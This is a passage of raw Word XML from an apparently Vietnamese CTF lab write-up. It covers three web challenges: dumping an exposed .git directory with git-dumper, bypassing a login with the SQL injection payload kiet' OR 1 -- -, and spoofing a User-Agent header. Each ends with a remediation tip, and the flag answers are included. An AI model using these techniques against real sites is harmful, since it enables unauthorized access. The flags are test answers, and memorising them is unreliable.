      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>mô tả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CBD183" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên ta sẽ vào trang để xem thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3158EC"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565EDE85" wp14:editId="108B8071">
            <wp:extent cx="6114105" cy="3149600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6114105" cy="3149600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="592D1067" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thấy được thông tin là flag ở flag.php và ta thử truy cập thử thì không được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DB21E0"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52CB26A6" wp14:editId="56967F9A">
            <wp:extent cx="6114105" cy="1079500"/>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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1079500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF5BC6" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta sẽ sử dụng dirb để check các domain có trong trang này và ta thấy được có </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trang .git</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1F60AD1F"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66AA13DB" wp14:editId="25C89B64">
            <wp:extent cx="6114105" cy="4152900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="4152900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADE5135" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ta sẽ sử dụng git-dumper để thực hiện lấy toàn bộ file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>về</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE3B04" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId77">
        <w:r w:rsidRPr="007913DC">
          <w:rPr>
            <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/arthaud/git-dumper</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="718ADD58" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="775A7173"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1BFE1536" wp14:editId="7D806FD6">
            <wp:extent cx="6114105" cy="3962400"/>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6114105" cy="3962400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF4BFA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tiếp theo ta vào file vừa tải về và ta lấy được flag trong file flag.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD291C2"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434F5FED" wp14:editId="571FD240">
            <wp:extent cx="6114105" cy="2984500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18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6114105" cy="2984500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E9471" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>flag be607453caada6a05d00c0ea0057f733</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1701B282" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Khuyến cáo: Chặn download bằng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3729D7A7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4304DF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351ECBBC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797AB446" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_heading=h.z2b064z62gil" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kịch bản Easy access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7362DE7B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Easy access - data, information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FE1B08" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện sql injection để truy cập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595FCF9B"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4BAC5502" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên ta sẽ thực hiện đăng nhập vào, thì ta không thể nào đăng nhập được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D46168D"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7AD1C234" wp14:editId="5C1446BD">
            <wp:extent cx="6114105" cy="3848100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3848100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DBFD7B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo ta sẽ kiểm tra thẻ elements trong trang thì ta thấy được thông tin user và pass: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;!---</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>user:bob,pass:password--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369844DB"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10EAB8A0" wp14:editId="17B97E30">
            <wp:extent cx="5705475" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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5705475" cy="3076575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A965210" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đăng nhập vào thì ta thấy bình thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D6F4BF"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422AA36C" wp14:editId="78CC319C">
            <wp:extent cx="6114105" cy="4622800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="4622800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2878216C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta sẽ thử một số cách khác bằng cách chèn thêm ký tự đặc biệt vào pass như là dấu nháy vào khung </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23A70481"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4C982389" wp14:editId="03980DF9">
            <wp:extent cx="6114105" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="2857500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59647B4A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ta thấy được rằng là báo lỗi sql, ta có thể thực hiện tấn công sql injection ở khung user và password tuỳ ý. user là: kiet' OR 1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDAA916"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7B5CBCB4" wp14:editId="2FC04EE3">
            <wp:extent cx="6114105" cy="3403600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21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6114105" cy="3403600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25959DB7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Vậy ta có thể đăng nhập vào </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D03E88"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7F9F19ED" wp14:editId="15B29389">
            <wp:extent cx="6114105" cy="2628900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="2628900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFBEB6F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>và flag là: flag</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>{!njection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_3v3ry_wh3r3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D83B6E5" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khuyến cáo: thực hiện lọc filter blacklist, whitelist dựa trên đầu vào data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410C6A86" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_heading=h.37mg3v2uew09" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Private Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F6FEC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Private Agent - data, information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C557106" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện chỉnh sửa gói tin để có thể có được thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DDC72C"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2B2ED494" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đầu tiên ta sẽ vào trang thì được thông báo là không được phép</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DF354"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7ED29AC0" wp14:editId="7087A97D">
            <wp:extent cx="6114105" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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6114105" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8CB4E2" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong phần element thì ta có thể thấy được thông tin là givittome có thể access khi được chỉnh sửa trong User-Agent của gói tin. Ta thực hiện bắt gói tin và gửi </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>đi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4D0413FF"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1F7E166D" wp14:editId="432F0A5F">
            <wp:extent cx="5915025" cy="4267200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5915025" cy="4267200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30800BEF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5691B0" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ta thấy được kết quả trả về có thông tin Xflag: W3lcome_Ag3nt8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031FD9D1"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7EADAFE1" wp14:editId="684154FB">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
